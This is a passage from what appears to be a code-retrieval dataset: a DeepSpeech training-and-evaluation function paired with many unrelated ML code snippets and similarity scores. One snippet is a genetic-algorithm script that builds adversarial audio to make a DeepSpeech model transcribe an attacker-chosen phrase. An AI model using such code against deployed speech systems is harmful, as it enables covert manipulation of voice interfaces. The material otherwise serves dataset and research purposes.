= data.DataLoader(test_data, batch_size=1,\r\n shuffle=True, collate_fn=test_data.collate_eval, drop_last=True)\r\n for batch_number, features in tqdm(enumerate(test_gen)):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n batch_metadata = features['metadata'][0]\r\n self.G = self.G.eval()\r\n\r\n outputs = self.G(spectrograms)\r\n outputs = np.squeeze(outputs.detach().cpu().numpy())\r\n phones = np.squeeze(phones.detach().cpu().numpy())\r\n phones = phones.astype(dtype=int)\r\n phones = [c2p[x] for x in phones]\r\n\r\n output_classes = np.argmax(outputs, axis=1)\r\n\r\n \"\"\"Decode the output predictions into a phone sequence\"\"\"\r\n # https://stackoverflow.com/questions/38065898/how-to-remove-the-adjacent-duplicate-value-in-a-numpy-array\r\n duplicates_eliminated = np.asarray([k for k, g in groupby(output_classes)])\r\n blanks_eliminated = duplicates_eliminated[duplicates_eliminated != 0]\r\n predicted_phones_ = [c2p[x] for x in blanks_eliminated]\r\n \"\"\"remove SOS and EOS\"\"\"\r\n predicted_phones = []\r\n for x in predicted_phones_:\r\n if x != 'SOS' and x != 'EOS':\r\n predicted_phones.append(x)\r\n\r\n data_to_save = {'speaker': batch_metadata['speaker'],\r\n 'word': batch_metadata['word'],\r\n 'true_phones': batch_metadata['phones'],\r\n 'predicted_phones': predicted_phones}\r\n dump_path = os.path.join(self.predict_dir, batch_metadata['utterance'] + '.pkl')\r\n joblib.dump(data_to_save, dump_path)", "def seed_dataset(data):\n\n timestamp = datetime.datetime.now()\n\n try:\n # set values\n dataset = Dataset()\n dataset.name = f'Dataset {timestamp.utcnow()}'\n dataset.description = f'Dataset created on {timestamp}'\n dataset.date_created = timestamp\n session.add(dataset)\n session.commit()\n print(f'Dataset {dataset.id} inserted')\n\n # seed the audiofile table\n Seed.seed_audio_file(dataset.id, data)\n except Exception as e:\n print(f'seed_dataset: {e}')", "def generate_data(path_to_metadata='../data/metadata.csv', path_to_data='../data/recordings', pcen=False):\n\n metadata = pd.read_csv(path_to_metadata)\n metadata = metadata.sample(frac=1).reset_index(drop=True)\n\n features_df = extract_features(metadata, path_to_data, sr=None, pcen=pcen)\n\n X = np.array(features_df.features.to_list())\n y = np.array(features_df.whistling.to_list())\n y1 = np.array(features_df.rhonchus.to_list())\n y2 = np.array(features_df.survival.to_list())\n\n return X, y, y1, y2", "def transcribe_asr(waveform, args, task, generator, models, sp, tgt_dict):\n num_features = 80\n output = torchaudio.compliance.kaldi.fbank(waveform, num_mel_bins=num_features)\n output_cmvn = calcMN(output.cpu().detach().numpy())\n\n # size (m, n)\n source = torch.tensor(output_cmvn)\n source = source.to(dev)\n frames_lengths = torch.LongTensor([source.size(0)])\n\n # size (1, m, n). 
In general, if source is (x, m, n), then hypos is (x, ...)\n source.unsqueeze_(0)\n sample = {'net_input': {'src_tokens': source, 'src_lengths': frames_lengths}}\n\n hypos = task.inference_step(generator, models, sample)\n\n assert len(hypos) == 1\n transcription = []\n print(hypos)\n for i in range(len(hypos)):\n # Process top predictions\n hyp_words = process_predictions_asr(args, hypos[i], sp, tgt_dict)\n transcription.append(hyp_words)\n\n print('transcription:', transcription)\n return transcription", "def prepare_corpus(self, final_training):\n if final_training:\n df_seq = self.data_processor.create_user_click_sequence()\n else:\n df_seq = self.data_processor.create_user_click_sequence(\n end_date=self.config[\"test_split_date\"]\n )\n sentences = df_seq[\"merchant_seq\"].values.tolist()\n sentences = [list(map(str, sent)) for sent in sentences]\n return sentences" ]
[ "0.64441484", "0.63849944", "0.62619036", "0.6223697", "0.6217612", "0.6186893", "0.61415535", "0.61275953", "0.6118419", "0.6101546", "0.606264", "0.6042652", "0.6013309", "0.59911335", "0.5944916", "0.5930794", "0.5930794", "0.5919748", "0.59102166", "0.5889595", "0.58870393", "0.58663243", "0.5860178", "0.58095616", "0.5807196", "0.5799068", "0.5778767", "0.5776289", "0.57585067", "0.5744408", "0.5742479", "0.5705505", "0.5705056", "0.57013184", "0.56870687", "0.5665761", "0.5651931", "0.5647774", "0.56330127", "0.5622853", "0.5598242", "0.5588493", "0.5588493", "0.5587593", "0.5579131", "0.5578032", "0.5559762", "0.55502516", "0.5546921", "0.55416715", "0.5530227", "0.5526114", "0.5515457", "0.5505887", "0.5503988", "0.54981154", "0.5494768", "0.5494431", "0.5488087", "0.548588", "0.5479531", "0.54772115", "0.547661", "0.5465097", "0.54596984", "0.5449322", "0.5420463", "0.5401676", "0.54004186", "0.53981674", "0.5392163", "0.53867745", "0.5377654", "0.53739977", "0.53732204", "0.53730905", "0.53590965", "0.5355586", "0.5355128", "0.5351516", "0.53455293", "0.5333028", "0.5328273", "0.5320349", "0.53187054", "0.5316439", "0.53135955", "0.5310265", "0.5304381", "0.52973604", "0.52962637", "0.5295887", "0.5295874", "0.5291921", "0.5287283", "0.52856934", "0.5284328", "0.5276923", "0.52757376", "0.52749985" ]
0.65369
0
Run deep speech training and eval loop.
def run_deep_speech():
  global FLAGS
  tf.set_random_seed(FLAGS.seed)

  # Data processing
  tf.logging.info("Data Processing...")
  train_speech_dataset = generate_dataset(FLAGS.data_dir, partition="train")
  eval_speech_dataset = generate_dataset(FLAGS.data_dir, partition="dev")

  # Number of label classes. Label string is "[a-z]' -"
  num_classes = len(train_speech_dataset.speech_labels)

  # not available in 1.4
  distribution_strategy = distribution_utils.get_distribution_strategy(num_gpus=FLAGS.num_gpus)
  run_config = es.RunConfig(train_distribute=distribution_strategy, session_config=get_session_config())

  estimator = es.Estimator(
      model_fn=model_fn,
      model_dir=FLAGS.model_dir,
      config=run_config,
      params={"num_classes": num_classes})

  run_params = {
      "batch_size": FLAGS.batch_size,
      "train_epochs": FLAGS.train_epochs,
      "rnn_hidden_size": FLAGS.rnn_hidden_size,
      "rnn_hidden_layers": FLAGS.rnn_hidden_layers,
      "rnn_type": FLAGS.rnn_type,
      "is_bidirectional": FLAGS.is_bidirectional,
      "use_bias": FLAGS.use_bias
  }

  benchmark_logger = logger.get_benchmark_logger()
  benchmark_logger.log_run_info(
      model_name="deep_speech",
      dataset_name="LibriSpeech",
      run_params=run_params,
      test_id=FLAGS.benchmark_test_id)

  train_hooks = hooks_helper.get_train_hooks(FLAGS.hooks, model_dir=FLAGS.model_dir, batch_size=FLAGS.batch_size)

  per_replica_batch_size = distribution_utils.per_replica_batch_size(FLAGS.batch_size, FLAGS.num_gpus)

  def input_fn_train():
    return train_speech_dataset.input_fn(batch_size=per_replica_batch_size)

  def input_fn_eval():
    return eval_speech_dataset.input_fn(batch_size=per_replica_batch_size)

  # total_training_cycle = FLAGS.train_epochs // FLAGS.epochs_between_evals
  total_training_cycle = FLAGS.train_epochs
  for cycle_index in range(total_training_cycle):
    tf.logging.info(f"Starting train cycle: {cycle_index + 1} / {total_training_cycle}")

    # Perform batch_wise dataset shuffling
    train_speech_dataset.batch_wise_shuffle(FLAGS.batch_size)

    # Train
    estimator.train(input_fn=input_fn_train, hooks=train_hooks)

    # Evaluation
    tf.logging.info("Starting to evaluate...")
    eval_results = evaluate_model(
        estimator,
        speech_labels=eval_speech_dataset.speech_labels,
        entries=eval_speech_dataset.entries,
        input_fn_eval=input_fn_eval)

    # Log the WER and CER results.
    benchmark_logger.log_evaluation_result(eval_results)
    tf.logging.info(
        f"Iteration {cycle_index + 1}: WER = {eval_results[_WER_KEY]:.2f}, CER = {eval_results[_CER_KEY]:.2f}")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def run(self):\n from audio import AudioRecorder\n\n loader = SingleInputLoader(128)\n recorder = AudioRecorder()\n\n with tf.Session() as sess:\n model = create_default_model('record', 128, loader)\n model.restore(sess, 'train/best-weights')\n \n while True:\n print('Listening...')\n audio, width = recorder.record()\n audio = np.array(audio)\n\n #calculate the power spectrum of the audio and of sampling rate 16000 \n input_ = preprocess.calculatePowerSpectrogram(audio, 16000)\n\n loader.set_input(input_)\n [decoded] = model.step(sess, loss=False, update=False, decode=True)\n\n decoded_ids_paths = [Test.extract_decoded_ids(path) for path in decoded]\n \n for decoded_path in decoded_ids_paths:\n decoded_ids = next(decoded_path)\n decoded_str = self.idsToSentence(decoded_ids)\n print('Predicted: {}'.format(decoded_str))", "def eval(self):\n # self.recognizer.eval()\n self.detector.eval()\n self.shared_conv.eval()", "def evaluate():\n\tmodel.eval()\n\tstddev = 1 # And mean=0\n\tfor batch_idx, (data, _) in enumerate(syn_test_loader):\n\t\tdata = data.cuda()\n\t\tif batch_idx == 0:\n\t\t\tnoise = torch.autograd.Variable(torch.randn(batch_size, bottleneck).cuda() * stddev)\n\t\t\tsample_representation(\"orig_nat\", data, noise)\n\t\t\tsample_representation(\"natural\", data, noise)\n\t\t\tsample_representation(\"orig_syn\", data, noise)\n\t\t\tsample_representation(\"synth\", data, noise)", "def train(self):\n params = self.params\n self.embedder.train()\n self.proj.train()\n\n # training variables\n losses = []\n ns = 0 # number of sentences\n nw = 0 # number of words\n t = time.time()\n\n iterator = self.get_iterator('train')\n lang_id = params.lang2id['en']\n\n while True:\n\n # batch\n try:\n batch = next(iterator)\n except StopIteration:\n break\n if self.n_sent == 1:\n (x, lengths), idx = batch\n x, lengths = truncate(x, lengths, params.max_len, params.eos_index)\n else:\n (sent1, len1), (sent2, len2), idx = batch\n sent1, len1 = truncate(sent1, len1, params.max_len, params.eos_index)\n sent2, len2 = truncate(sent2, len2, params.max_len, params.eos_index)\n x, lengths, _, _ = concat_batches(sent1, len1, lang_id, sent2, len2, lang_id, params.pad_index, params.eos_index, reset_positions=False)\n y = self.data['train']['y'][idx]\n bs = len(lengths)\n\n # cuda\n x, y, lengths = to_cuda(x, y, lengths)\n\n # loss\n output = self.proj(self.embedder.get_embeddings(x, lengths, positions=None, langs=None))\n if self.is_classif:\n loss = F.cross_entropy(output, y, weight=self.weights)\n else:\n loss = F.mse_loss(output.squeeze(1), y.float())\n\n # backward / optimization\n self.optimizer_e.zero_grad()\n self.optimizer_p.zero_grad()\n loss.backward()\n self.optimizer_e.step()\n self.optimizer_p.step()\n\n # update statistics\n ns += bs\n nw += lengths.sum().item()\n losses.append(loss.item())\n\n # log\n if ns != 0 and ns % (10 * bs) < bs:\n logger.info(\n \"GLUE - %s - Epoch %s - Train iter %7i - %.1f words/s - %s Loss: %.4f\"\n % (self.task, self.epoch, ns, nw / (time.time() - t), 'XE' if self.is_classif else 'MSE', sum(losses) / len(losses))\n )\n nw, t = 0, time.time()\n losses = []\n\n # epoch size\n if params.epoch_size != -1 and ns >= params.epoch_size:\n break", "def run(self, verbose=0):\n self.verbose = verbose\n self._preproc()\n self._lda()\n self._evaluate()", "def run(self):\n for _ in range(self.epoch, conf.FX_MAX_EPOCHS):\n self.train()\n\n with torch.no_grad():\n self.test()\n\n self.epoch += 1\n self.save_ck()\n\n self.show_completion_msg()", "def learn(self):\n\n for i in 
range(1, self.args.numIters + 1):\n # bookkeeping\n log.info(f'Starting Iter #{i} ...')\n # examples of the iteration\n if not self.skipFirstSelfPlay or i > 1:\n iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)\n\n for _ in tqdm(range(self.args.numEps), desc=\"Self Play\"):\n self.mcts = MCTS(self.game, self.nnet, self.args) # reset search tree\n iterationTrainExamples += self.executeEpisode()\n\n # save the iteration examples to the history \n self.trainExamplesHistory.append(iterationTrainExamples)\n\n if len(self.trainExamplesHistory) > self.args.numItersForTrainExamplesHistory:\n log.warning(\n f\"Removing the oldest entry in trainExamples. len(trainExamplesHistory) = {len(self.trainExamplesHistory)}\")\n self.trainExamplesHistory.pop(0)\n # backup history to a file\n # NB! the examples were collected using the model from the previous iteration, so (i-1) \n self.saveTrainExamples(i - 1)\n\n # shuffle examples before training\n trainExamples = []\n for e in self.trainExamplesHistory:\n trainExamples.extend(e)\n shuffle(trainExamples)\n\n # training new network, keeping a copy of the old one\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename='temp.pth.tar')\n self.pnet.load_checkpoint(folder=self.args.checkpoint, filename='temp.pth.tar')\n pmcts = MCTS(self.game, self.pnet, self.args)\n\n self.nnet.train(trainExamples)\n nmcts = MCTS(self.game, self.nnet, self.args)\n\n log.info('PITTING AGAINST PREVIOUS VERSION')\n arena = Arena(lambda x: np.argmax(pmcts.getActionProb(x, temp=0)),\n lambda x: np.argmax(nmcts.getActionProb(x, temp=0)), self.game)\n pwins, nwins, draws = arena.playGames(self.args.arenaCompare)\n\n log.info('NEW/PREV WINS : %d / %d ; DRAWS : %d' % (nwins, pwins, draws))\n if pwins + nwins == 0 or float(nwins) / (pwins + nwins) < self.args.updateThreshold:\n log.info('REJECTING NEW MODEL')\n self.nnet.load_checkpoint(folder=self.args.checkpoint, filename='temp.pth.tar')\n else:\n log.info('ACCEPTING NEW MODEL')\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=self.getCheckpointFile(i))\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename='best.pth.tar')", "def run_training_loop():\n logging.info(\"Starting the training loop.\")\n\n trainer = trainer_class(\n output_dir=output_dir,\n train_env=train_env,\n eval_env=eval_env,\n trajectory_dump_dir=trajectory_dump_dir,\n )\n trainer.training_loop(n_epochs=n_epochs)", "def run_step(self):\n assert self.model.training, \"[SimpleTrainer] model was changed to eval mode!\"\n start = time.perf_counter()\n \"\"\"\n If your want to do something with the data, you can wrap the dataloader.\n \"\"\"\n data = next(self._data_loader_iter)\n data_time = time.perf_counter() - start\n\n \"\"\"\n If your want to do something with the losses, you can wrap the model.\n \"\"\"\n loss_dict = self.model(data)\n losses = sum(loss for loss in loss_dict.values())\n self._detect_anomaly(losses, loss_dict)\n\n metrics_dict = loss_dict\n metrics_dict[\"data_time\"] = data_time\n self._write_metrics(metrics_dict)\n \n validation_data = next(self.validation_data_loader_iter)\n val_losses_dict = self.model(validation_data)\n val_losses = sum(loss for loss in val_losses_dict.values())\n self._detect_anomaly(val_losses, val_losses_dict)\n\n val_metrics_dict = val_losses_dict\n val_metrics_dict[\"data_time\"] = data_time\n self._write_validation_metrics(val_metrics_dict)\n\n \"\"\"\n If you need accumulate gradients or something similar, you can\n wrap the optimizer with your custom `zero_grad()` 
method.\n \"\"\"\n self.optimizer.zero_grad()\n losses.backward()\n\n \"\"\"\n If you need gradient clipping/scaling or other processing, you can\n wrap the optimizer with your custom `step()` method.\n \"\"\"\n self.optimizer.step()", "def run(self):\n # Observe the game by randomly sampling actions from the environment\n # and performing those actions\n self.__observe__()\n for i in xrange(self.num_epochs):\n self.environment.resetStatistics()\n time_now = time.time()\n for j in xrange(self.train_steps_per_epoch):\n # Get action using epsilon-greedy strategy\n action = self.__sample_epsilon_action__()\n # Perform action based on epsilon-greedy search and store the transitions\n # in experience replay\n self.__supply_action_to_environment__(action)\n # If the environment is in the terminal state, reset the environment, and\n # perform self.stack_num actions to reset the environment\n self.isGameOver()\n if j % self.train_frequency == 0:\n # print \"Started training\"\n # Sample minibatch of size self.minibatch_size from experience replay\n minibatch = self.experience_replay.sample()\n minibatch_states, minibatch_action, minibatch_reward, minibatch_next_states, \\\n minibatch_terminals = minibatch\n cost = self.network.train_network(minibatch_states,\n minibatch_action,\n minibatch_reward,\n minibatch_terminals,\n minibatch_next_states)\n if j % self.record_frequency == 0:\n total_score, num_games = self.environment.getStatistics()\n avg_score = total_score / num_games\n self.network.record_average_qvalue(\n self.experience_replay.getCurrentState(),\n i * self.train_steps_per_epoch + j,\n self.epsilon, avg_score)\n # Epsilon annealing\n self.__anneal_epsilon__()\n # if self.time_step % 1000 == 0:\n # print \"Cost at iteration\", self.time_step, \" is\", cost\n # print \"Value of epsilon is\", self.epsilon\n self.steps += 1\n if j % self.copy_steps == 0:\n self.network.copy_weights()\n total_score, num_games = self.environment.getStatistics()\n time_taken = (time.time() - time_now)\n logger.info(\"Finished epoch %d: Steps=%d; Time taken=%.2f\",\n i, j, time_taken)\n logger.info(\"\\tNumber of games: %d; Average reward: %.2f\", num_games, (total_score / num_games))\n logger.info(\"\\tFinal epsilon value for epoch: %f\", self.epsilon)\n self.network.create_checkpoint()", "def run(self):\n time.sleep(np.random.rand())\n np.random.seed(np.int32(time.time() % 1000 * self.id))\n \n # Put this in a while loop that checks a shared variable\n # Will keep running episodes until the shared variable reports False\n while(self.exit_flag == 0):\n for experience in self.run_episode():\n print(experience.state, experience.reward)\n self.training_q.put(experience)", "def run(self) -> None:\n self.model = self.trainer.train_model(self.model, self.data)", "def main():\r\n\r\n mutation_range = 150\r\n parser = argparse.ArgumentParser(description=None)\r\n parser.add_argument('--input', type=str, dest=\"input\",\r\n required=True,\r\n help=\"Input audio .wav file(s) at 16KHz\")\r\n parser.add_argument('--target', type=str,\r\n required=True,\r\n help=\"Target transcription\")\r\n parser.add_argument('--out', type=str,\r\n required=True,\r\n help=\"Path for the adversarial example(s)\")\r\n parser.add_argument('--iterations', type=int,\r\n required=False, default=1000,\r\n help=\"Maximum number of iterations of gradient descent\")\r\n parser.add_argument('--population', type=int,\r\n required=False, default=100,\r\n help=\"Population size of each generation\")\r\n parser.add_argument('--model_path', 
type=str,\r\n required=True,\r\n help=\"Path to the DeepSpeech checkpoint (ending in model0.4.1)\")\r\n args = parser.parse_args()\r\n while len(sys.argv) > 1:\r\n sys.argv.pop()\r\n\r\n population_size = args.population\r\n\r\n with tf.Session() as sess:\r\n # finetune = []\r\n audios = []\r\n lengths = []\r\n\r\n # if args.out is None:\r\n # assert args.outprefix is not None\r\n # else:\r\n # assert args.outprefix is None\r\n # assert len(args.input) == len(args.out)\r\n # if args.finetune is not None and len(args.finetune):\r\n # assert len(args.input) == len(args.finetune)\r\n\r\n # Load the inputs that we're given\r\n \r\n fs, audio = wav.read(args.input)\r\n # print(\"Original Audio: \" + interpret_audio(audio, fs))\r\n assert fs == 16000\r\n assert audio.dtype == np.int16\r\n # print(audio)\r\n # print('source dB', 20 * np.log10(np.max(np.abs(audio))))\r\n audios.append(list(audio))\r\n lengths.append(len(audio))\r\n\r\n for i in range(population_size):\r\n wn = np.random.randint(-mutation_range, mutation_range, size=len(audio), dtype=np.int16)\r\n mutated_audio = audio + wn\r\n audios.append(list(mutated_audio))\r\n lengths.append(len(mutated_audio))\r\n\r\n # if args.finetune is not None:\r\n # finetune.append(list(wav.read(args.finetune[i])[1]))\r\n\r\n\r\n maxlen = max(map(len, audios))\r\n audios = np.array([x + [0] * (maxlen - len(x)) for x in audios])\r\n\r\n phrase = args.target\r\n # Set up the attack class and run it\r\n attack = Attack(sess, len(phrase), maxlen, batch_size=len(audios), model_path=args.model_path)\r\n \r\n \r\n\r\n optimal_cost, optimal_audio1, optimal_audio2 = attack.attack(audios, lengths, [[toks.index(x) for x in phrase]] * len(audios), True)\r\n crossover_population = int(0.2*population_size)\r\n mutation_population = population_size - (2 * crossover_population)\r\n\r\n for i in range(args.iterations):\r\n # Reset audios to only the generational best audio\r\n print_toggle = False\r\n if (i+1) % 10 == 0:\r\n print_toggle = True\r\n\r\n audios = [optimal_audio1]\r\n lengths = [len(optimal_audio1)]\r\n\r\n \r\n\r\n mutated_audios, mutated_lengths = mutate_audio(optimal_audio1, mutation_population, mutation_range)\r\n crossover_audios, crossover_lengths = crossover_audio(optimal_audio1, optimal_audio2, crossover_population)\r\n\r\n audios.extend(mutated_audios)\r\n audios.extend(crossover_audios)\r\n\r\n lengths.extend(mutated_lengths)\r\n lengths.extend(crossover_lengths)\r\n\r\n \r\n xcost, xaudio1, xaudio2 = attack.attack(audios, lengths, [[toks.index(x) for x in phrase]] * len(audios), print_toggle)\r\n\r\n if xcost < optimal_cost:\r\n optimal_cost = xcost\r\n optimal_audio1 = xaudio1\r\n optimal_audio2 = xaudio2\r\n \r\n print(\"iteration: \" + str(i+1) + \"\\t\" + \"Cost: \" + str(optimal_cost))\r\n\r\n wav.write(args.out, 16000, optimal_audio1)", "def eval(self):\n self.train(mode=False)", "def learn(self):\n\n for i in range(1, self.args.numIters + 1):\n print('------ ITER ' + str(i) + '------')\n iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)\n\n for eps in range(self.args.numEps):\n print('------ Self Play Episode ' + str(eps) + '------')\n self.mcts = TSPMCTS(self.args, self.game, self.nnet) # reset search tree\n iterationTrainExamples += self.executeEpisode()\n\n # save the iteration examples to the history\n self.trainExamplesHistory.append(iterationTrainExamples)\n\n if len(self.trainExamplesHistory) > self.args.numItersForTrainExamplesHistory:\n self.trainExamplesHistory.pop(0)\n\n # shuffle examples before training\n 
trainExamples = []\n for e in self.trainExamplesHistory:\n trainExamples.extend(e)\n\n # training new network\n if self.args.numEps > 0:\n self.nnet.train(trainExamples)\n nmcts = TSPMCTS(self.args, self.game, self.nnet)\n\n print('PLAYING GAMES')\n if self.args.arenaCompare:\n arena = SinglePlayerArena(lambda x: np.argmax(nmcts.getActionProb(x, temp=0)), self.game)\n wins, losses = arena.playSinglePlayerGames(self.args.arenaCompare)\n print('WINS/LOSSES: %d / %d' % (wins, losses))", "def run(self):\n try:\n for i in range(self.game_batch_num):\n episode_len = self.collect_selfplay_data()\n if len(self.data_buffer) > self.batch_size:\n loss, entropy = self.policy_update()\n print((\"batch i:{}, \"\n \"episode_len:{}, \"\n \"loss:{:.4f}, \"\n \"entropy:{:.4f}\"\n ).format(i+1,\n episode_len,\n loss,\n entropy))\n else:\n print(\"batch i:{}, \"\n \"episode_len:{}\".format(i+1, episode_len))\n # 定期保存模型\n if (i+1) % self.check_freq == 0:\n self.policy_value_net.save_model(\n './current_policy.model')\n except KeyboardInterrupt:\n print('\\n quit')", "def train(self):\n self.epoch = 0\n self.step = 0\n self.start_time = time.time()\n for self.epoch in range(self.opt.num_epochs):\n self.run_epoch()\n if (self.epoch + 1) % self.opt.save_frequency == 0:\n self.save_model()", "def train(self):\n self.epoch = 0\n self.step = 0\n self.start_time = time.time()\n for self.epoch in range(self.num_epochs):\n print(\"EPOHA\")\n self.run_epoch()\n print(\"SAVE MODEL\")\n self.save_model()", "def train(self):\n # self.recognizer.train()\n self.detector.train()\n self.shared_conv.train()", "def eval_model(self, eval_data): # noqa: ignore flake8\"\n os.makedirs(self.model_dir, exist_ok=True)\n source_texts, target_texts = create_dataset(eval_data)\n logger.info(\"Evaluating the model...\")\n logger.info(\"Number of examples: {}\".format(len(source_texts)))\n\n if self.src_2_ids is None:\n self.src_2_ids = load_word_dict(self.src_vocab_path)\n self.trg_2_ids = load_word_dict(self.trg_vocab_path)\n if self.model is None:\n if os.path.exists(self.model_path):\n self.model = Seq2Seq(\n encoder_vocab_size=len(self.src_2_ids),\n decoder_vocab_size=len(self.trg_2_ids),\n embed_size=self.embed_size,\n enc_hidden_size=self.hidden_size,\n dec_hidden_size=self.hidden_size,\n dropout=self.dropout\n )\n self.load_model()\n self.model.to(device)\n else:\n raise ValueError(\"Model not found at {}\".format(self.model_path))\n self.model.eval()\n\n train_src, train_trg = one_hot(source_texts, target_texts, self.src_2_ids, self.trg_2_ids, sort_by_len=True)\n\n id_2_srcs = {v: k for k, v in self.src_2_ids.items()}\n id_2_trgs = {v: k for k, v in self.trg_2_ids.items()}\n logger.debug(f'evaluate src: {[id_2_srcs[i] for i in train_src[0]]}')\n logger.debug(f'evaluate trg: {[id_2_trgs[i] for i in train_trg[0]]}')\n eval_data = gen_examples(train_src, train_trg, self.batch_size, self.max_length)\n\n total_num_words = 0.\n total_loss = 0.\n with torch.no_grad():\n for it, (mb_x, mb_x_len, mb_y, mb_y_len) in enumerate(eval_data):\n mb_x = torch.from_numpy(mb_x).to(device).long()\n mb_x_len = torch.from_numpy(mb_x_len).to(device).long()\n mb_input = torch.from_numpy(mb_y[:, :-1]).to(device).long()\n mb_output = torch.from_numpy(mb_y[:, 1:]).to(device).long()\n mb_y_len = torch.from_numpy(mb_y_len - 1).to(device).long()\n mb_y_len[mb_y_len <= 0] = 1\n\n mb_pred, attn = self.model(mb_x, mb_x_len, mb_input, mb_y_len)\n\n mb_out_mask = torch.arange(mb_y_len.max().item(), device=device)[None, :] < mb_y_len[:, None]\n mb_out_mask = 
mb_out_mask.float()\n\n loss = self.loss_fn(mb_pred, mb_output, mb_out_mask)\n\n num_words = torch.sum(mb_y_len).item()\n total_loss += loss.item() * num_words\n total_num_words += num_words\n loss = total_loss / total_num_words\n logger.info(f\"Evaluation loss: {loss}\")\n return {'loss': loss}", "def train(self):\n params = self.params\n self.encoder.train()\n self.proj.train()\n\n # training variables\n losses = []\n ns = 0 # number of sentences\n nw = 0 # number of words\n t = time.time()\n\n iterator = self.get_iterator('train', 'en')\n lang, lang_id = 'en', params.lang2id['en']\n while True:\n # batch\n try:\n batch = next(iterator)\n except StopIteration:\n break\n (sent1, len1), idx = batch\n x, lengths = truncate(sent1, len1, params.max_len, params.eos_index)\n lang_ids = x.clone().fill_(lang_id)\n\n y = self.data['en']['train']['y'][idx]\n bs = len(len1)\n\n # cuda\n x, y, lengths, lang_ids = to_cuda(x, y, lengths, lang_ids)\n\n # loss\n output = self.proj(self.encoder.get_embeddings(x, lengths, langs=lang_ids))\n loss = F.cross_entropy(output, y)\n\n # backward / optimization\n self.optimizer_e.zero_grad()\n self.optimizer_p.zero_grad()\n loss.backward()\n self.optimizer_e.step()\n self.optimizer_p.step()\n\n # update statistics\n ns += bs\n nw += lengths.sum().item()\n losses.append(loss.item())\n\n # log\n if ns % (100 * bs) < bs:\n logger.info(\"CLF - Epoch %i - Train iter %7i - %.1f words/s - Loss: %.4f\" % (\n self.epoch, ns, nw / (time.time() - t), sum(losses) / len(losses)))\n nw, t = 0, time.time()\n losses = []\n\n # epoch size\n if params.epoch_size != -1 and ns >= params.epoch_size:\n break", "def run(self):\n # This should do nothing if the user has already configured\n # logging, and will it least enable error messages otherwise.\n logging.basicConfig()\n\n # If this is resumption from a checkpoint, it is crucial to\n # reset `profile.current`. 
Otherwise, it simply does not hurt.\n self.profile.current = []\n\n # Sanity check for the most common case\n if (self._model and isinstance(self._model, Model) and\n isinstance(self.algorithm, GradientDescent)):\n if not (set(self._model.get_parameter_dict().values()) ==\n set(self.algorithm.parameters)):\n logger.warning(\"different parameters for model and algorithm\")\n\n with change_recursion_limit(config.recursion_limit):\n self.original_sigint_handler = signal.signal(\n signal.SIGINT, self._handle_epoch_interrupt)\n self.original_sigterm_handler = signal.signal(\n signal.SIGTERM, self._handle_batch_interrupt)\n try:\n logger.info(\"Entered the main loop\")\n if not self.status['training_started']:\n for extension in self.extensions:\n extension.main_loop = self\n self._run_extensions('before_training')\n with Timer('initialization', self.profile):\n self.algorithm.initialize()\n self.status['training_started'] = True\n # We can not write \"else:\" here because extensions\n # called \"before_training\" could have changed the status\n # of the main loop.\n if self.log.status['iterations_done'] > 0:\n self.log.resume()\n self._run_extensions('on_resumption')\n self.status['epoch_interrupt_received'] = False\n self.status['batch_interrupt_received'] = False\n with Timer('training', self.profile):\n while self._run_epoch():\n pass\n except TrainingFinish:\n self.log.current_row['training_finished'] = True\n except Exception as e:\n self._restore_signal_handlers()\n self.log.current_row['got_exception'] = traceback.format_exc()\n logger.error(\"Error occured during training.\" + error_message)\n try:\n self._run_extensions('on_error')\n except Exception:\n logger.error(traceback.format_exc())\n logger.error(\"Error occured when running extensions.\" +\n error_in_error_handling_message)\n reraise_as(e)\n finally:\n self._restore_signal_handlers()\n if self.log.current_row.get('training_finished', False):\n self._run_extensions('after_training')\n if config.profile:\n self.profile.report()", "def training(self) -> None:\n self.compile_model()\n self.train_epoch()\n self.agent.save()", "def run_epoch(model, data, id_2_word, is_train=False, is_test=False, lr=1.0):\n if is_train:\n model.train() # train the model\n else:\n model.eval() # test or validate the model\n\n future_word_num = args.future_word_num\n epoch_size = ((len(data) // model.module.batch_size) - future_word_num) // model.module.num_steps\n start_time = time.time()\n hidden = model.module.init_hidden()\n\n costs = 0.0\n iters = 0\n # total = 0\n # correct = 0\n # total_train = 0\n # correct_train = 0\n true_pos = 0\n false_pos = 0\n false_neg = 0\n\n for step, (x, y) in enumerate(reader.ptb_iterator(data, model.module.batch_size, model.module.num_steps, future_word_num)):\n\n inputs = Variable(torch.from_numpy(x.astype(np.int64)).transpose(0,1).contiguous()).cuda()\n #print(inputs.size())\n #print(inputs)\n # model.zero_grad() # clear the gradient in previous step\n\n hidden = repackage_hidden(hidden) # type(hidden) is 'tuple'\n outputs, hidden = model(inputs, hidden)\n\n # outputs = F.sigmoid(outputs);\n\n # targets = Variable(torch.from_numpy(y.astype(np.int64)).transpose(0,1).contiguous()).cuda()\n \n\n # tt = torch.squeeze(targets.view(-1, model.module.batch_size * model.module.num_steps))\n # reshape y into a 1-d tensor\n\n index = []\n for j in range(y.shape[1]-future_word_num+1):\n pair = y[:, j:j+future_word_num]\n index.append(pair)\n\n index_ = np.asarray(index)\n target_loss = []\n for i in 
range(model.module.num_steps):\n t = index_[i]\n for j in range(model.module.batch_size):\n t_ = t[j]\n tt = np.zeros(vocab_size, dtype=np.int64)\n tt[t_] = 1\n target_loss.append(tt)\n\n targetLoss = np.asarray(target_loss)\n targetLoss = Variable(torch.from_numpy(targetLoss).contiguous()).float().cuda()\n\n # outputs.view(-1, model.vocab_size).size() = 700 x 10000\n # tt.size() = 700\n # inp = torch.squeeze(inputs.view(-1, model.batch_size * model.num_steps))\n out_loss = outputs.view(-1, model.module.vocab_size)\n # max_val, index = torch.max(out_loss, dim=1)\n\n # ######\n # word_inp = []\n # word_pred = []\n # word_tt = []\n # word_id_pred = []\n # word_id_tt = []\n\n # for i in range(list(index.size())[0]):\n # ind_inp = inp.data[i]\n # w_inp = id_2_word[ind_inp]\n # word_inp.append(w_inp)\n\n # ind_pred = list(index.data[i])[0]\n # w_pred = id_2_word[ind_pred]\n # word_pred.append(w_pred)\n # word_id_pred.append(ind_pred)\n\n # ind_tt = tt.data[i]\n # w_tt = id_2_word[ind_tt]\n # 